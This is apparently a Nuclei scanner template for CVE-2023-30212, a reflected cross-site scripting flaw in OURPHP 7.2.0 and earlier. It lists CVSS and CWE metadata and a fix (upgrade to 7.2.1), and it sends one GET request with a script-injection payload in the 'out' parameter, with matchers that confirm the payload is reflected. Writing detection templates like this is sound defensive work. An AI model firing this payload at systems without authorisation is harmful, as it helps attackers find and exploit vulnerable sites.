52 lines
1.5 KiB
YAML
52 lines
1.5 KiB
YAML
id: CVE-2023-30212
|
|
|
|
info:
|
|
name: OURPHP <= 7.2.0 - Cross Site Scripting
|
|
author: theamanrawat
|
|
severity: medium
|
|
description: |
|
|
OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.
|
|
remediation: |
|
|
Upgrade to a patched version of OURPHP (7.2.1 or higher) to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.ourphp.net/
|
|
- https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-out-php-Reflection-xss/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-30212
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-30212
|
|
cwe-id: CWE-79
|
|
epss-score: 0.02614
|
|
epss-percentile: 0.89167
|
|
cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: ourphp
|
|
product: ourphp
|
|
tags: cve,cve2023,xss,ourphp
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "location.href='../..</script><script>alert(document.domain)</script>'"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a0047304502201131a9f099e836eab82f9a1800b523d82bdc1d17b4f28b7b26ad56445a9fb0c2022100bc6c952fbf9bfdbda077834a38a92bb62a0784de8e89220898a5388b3cf6733f:922c64590222798bb761d5b6d8e72950
|